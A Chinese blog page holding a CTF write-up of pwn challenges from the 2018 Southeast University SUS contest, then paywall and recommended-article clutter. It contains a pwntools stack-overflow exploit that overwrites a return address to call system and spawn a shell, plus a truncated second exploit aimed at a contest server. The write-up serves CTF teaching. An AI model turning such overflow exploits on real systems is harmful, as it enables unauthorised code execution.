2018东南大学 SUS 十一欢乐赛 pwn解题记录

最新推荐文章于 2022-03-03 02:29:18 发布
最新推荐文章于 2022-03-03 02:29:18 发布
阅读量349 收藏
点赞数
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/weixin_44113469/article/details/88716281
本文记录了2018年东南大学SUS比赛中的pwn解题过程,涉及pwn2plus和pwn4两道题目。pwn2plus通过栈溢出覆盖调用system函数实现,输入'/bin/sh'触发。pwn4题存在栈溢出,利用puts泄露函数地址,计算libc偏移,通过ROP构造调用system获取shell。解题过程中使用了ropgadget和libsearcher等工具。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

pwn2plus
在这里插入图片描述
直接栈溢出覆盖调用callsystem函数。

exp

from pwn import *
#p = remote("47.100.40.190" , 10007)
p=process("./pwn2")
elf = ELF("./pwn2")
callsystem=0x400596
pay = "a"*0x80+"a"*8
pay +=p64(callsystem)+p64(0xbeeeffff)
p.recvuntil("Hello, World")
p.sendline(pay)
p.interactive()

bss_stack

在这里插入图片描述
在这里插入图片描述
在这里插入图片描述

题目提示,bin/sh要写入,然后调用system函数,思路就是先输入"/bin/sh"让程序if判断为真,然后利用fgets函数栈溢出覆盖调用system。

exp

from pwn import *
p = remote("47.100.40.190" , 10011)
#p=process("./pwn3")
elf = ELF(
最低0.47元/天 解锁文章

200万优质内容无限畅学
梦回Altay
关注
SUSCTF 2018 做题记录
0verWatch的博客
06-05 7277
前言 最近好久都没做题目,刚好上次搭的题目还在,就不要浪费了,记录记录做题过程吧 正文 minBash 这个题目考的点是沙盒绕过,第一次玩这个东西??反正进去之后尝试ls,cat,file等各种那个命令均无效果,都会显示 -rbash: ls: command not found 发现有一篇好文章,有空瞅瞅:http://cauc.me/2017/11/16/python沙盒绕...
服务器中PWN题的简单搭建
mylyylmy的博客
04-12 6403
首先,创建一个虚拟环境使用passwd root将root密码修改其中SSH端口号8136是远程SSH登陆时用的端口号 WEB端口号为服务器端映射到docker8080端口的端口号即所以我们要先上传题目到我们的docker中这时使用XShell或者scp命令都可以,这里演示XShell使用Xftp上传文件到服务器端创建或者上传flag文件新增低权限账户(选),新建pwn文件夹,更改运行程序(pwn...
安恒月WriteUp-2018.12
BlusKing
12-22 3084
安恒月WriteUp2018-12月   WEB1-easy: web1反序列化   一打开就显示了源代码:  <?php   @error_reporting(1); include 'flag.php'; class baby {        public $file;     function __toString()           {      ...
安恒 12月 pwn ----messageb0x
qq_42192672的博客
12-24 848
这次安恒就看了pwn题,第二个是orange,还不会,就做了下第一个 总体就是个简单的rop,但是有个坑就是题目让我们猜libc的版本到底是啥 然后我在IDA里看到了一个字符串 被坑惨了,在2.27调试了半天后来发现是2.23的,哭了 #coding=utf8 from pwn import * context.log_level = 'debug' context.terminal...
pwn-messageb0x-学习笔记
小龙在线
08-27 570
messageb0x是一个32位的ELF文件,用IDA打开: F5反编译: 关键在于process_info这个函数: v1的输入字符2000xC8)限制明显大于栈的ebp的58h,所以存在溢出漏洞。 然后Shift+F12查看字符串,看有没有特殊字符串(system),没有: 可以利用 查找libc版本和system的偏移: 攻击脚本: from pwn import * elf = ELF('./messageb0x') sh = process('./messageb0x') puts
2018 -12月份 安恒月 pwn
Maxmalloc的博客
12-23 1594
Messageb0x $ file messageb0x messageb0x: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), dynamically linked, interpreter /lib/ld-linux.so.2, for GNU/Linux 3.2.0, BuildID[sha1]=d932d2afbca74...
SUSCTF 2019
皮三宝好菜的博客
04-14 1121
SUSCTF 2019 http://www.psbazx.com/2019/04/14/susctf-2019/ 懒得搬过来了。。。
ciscn2018-pwn:2018大学生信息安全国pwn出题docker
05-11
CISCN2018: May be a calculator? Author Description 开放服务端口为1337 出题模板参考 Category Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /...
CSAWCTF-2018-pwn-shellcode|CSAWCTF-2018-pwn-shellcode
12-10
CSAWCTF 2018pwn题 shellcode 变形shellcode练手题目,该题目主要是利用三个节点来注入shellcode,考验解题人对shellcode的熟悉程度。题解:https://blog.youkuaiyun.com/A951860555/article/details/110350773
题目源码2024年强网杯全国网络安全挑战 PWN题目baby-heap源码
最新发布
11-07
2024年强网杯全国网络安全挑战是针对网络安全爱好者的一次盛会,尤其是PWN题目,这类题目往往要求参者利用软件中的漏洞,获取或提升权限。本次提供的“baby-heap”源码,很可能是一个针对堆内存管理的漏洞利用...
Bugku S3 AWD排位-9 pwn二进制
08-27
Bugku S3 AWD排位-9 pwn二进制
SUSCTF逆向部分WP
WocW的博客
04-13 561
RE1 签到题 直接拖入IDA查看主函数。 RE2 拖入IDA查看主函数,只有一个输入和简单的比较。 根据比较算法写出python脚本 a=[0x53,0x54 ,0x51,0x40,0x50 ,0x43 ,0x7D ,0x26 ,0x29 ,0x28 ,0x46 ,0x5A ,0x58 ,0x6A ,0x60 ,0x66,0x69,0x74,0x6b,0x6E] for i in range...
SUS迷你ftp后门
weixin_34018202的博客
08-02 138
文章作者:单克隆抗体信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])注意:文章首发东南大学网络安全联盟论坛([url]www.bestseu.com/sus/[/url]),后由作者友情提交到邪恶八进制信息安全团队技术论坛,转载请注明首发站点。这个后门的思路绝对新颖,将后门融入小巧的ftp服务器中.既能进行快...
[susctf2022-pwn] 02-happytree
weixin_52640415的博客
02-28 481
早晨才看到比,9点就结束。结束后作了一道题。 堆有漏洞大概有3个:UAF,写溢出,未初始化指针。其中未初始化指针是最难找了,一般想不到。不过也有个办法如果找不着前边两个就找后边这个。 题目有add,show,free三个函数。其中add有两个未初始化指针: __int64 __fastcall m1add(__int64 a1, __int64 a2, unsigned int a3) { __int64 v5; // [rsp+10h] [rbp-10h] v5 = a2; if
CTF-60 writeup
热门推荐
a370793934的专栏
03-25 1万+
Web Web1 文件包含 打开看到源码 <?php include "flag.php"; $a = @$_REQUEST['hello']; eval( "var_dump($a);"); show_source(__FILE__); ?> eval() 函数存在命令执行漏洞,构造出文件包含会把字符串参数当做代码来执行...
CTF总结-PWN
qq_42747131的博客
05-14 7391
一、通用过程 通过file指令查看二进制文件是32位还是64位,这个影响特别大(涉及参数的传递方式) 通过checksec指令查看可执行文件的保护措施开启情况 运行一下这个可执行文件,了解一些程序运行流程 开始通过pwntools解题 pwntools 二、缓冲区溢出攻击 寻找可以进行攻击的位置 通过cyclic [number] 获得一个长度为number的序列 在攻击处输入上一步获得的序列,查看报错信息 通过cyclic -l [序列] 来判断从第几位开始覆盖的是返回地址 构造payload 构造
SUSCTF2022 Misc
mumuzi的博客
03-01 2427
Misc就两个字 无语 文章目录Misccheckinra2TannermisoundAUDIOReDigitalCircuits Misc checkin ra2 下载下来是红警2,由于不是exe打开的,因此地图编辑器没用。打开游戏之后发现有个mission,是和 flag有关的,于是用notepad++全局搜一下mission里面的内容,找到ctf-01 其中发现规则是在ctf-01.lua当中,因为难度只有后两个,所以修改一下 然后发现白天只有30s,于是再修改成120s(事实上应该改贼大的一个数
SUSCTF rain
sky123博客
03-03 799
分析代码 main void __fastcall __noreturn main(__int64 a1, char **a2, char **a3) { int num; // [rsp+14h] [rbp-Ch] int *info; // [rsp+18h] [rbp-8h] sub_401D2F(a1, a2, a3); while ( 1 ) { info = init_info(); while ( 1 ) { while ( 1 )
SUSCTF|WP:CrakeMe 一道android逆向
BadRer的博客
04-01 904
前言可能是第一次单字节手动爆flag开始这题是一个涉及到so动态调试的apk。我之前都是用红米note来进行动态调试的,因为android4.4感觉脱壳比较容易,但这次的版本要求为api 26也就是android8.0.这就有点蛋疼了,还好我自己用的手机够格,所以就拿自己手机上了。先是搭了一波环境,64位32位搞不清了都,ida附加了半天没附加上去,最后使用64位来调的。 check1函数的过
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值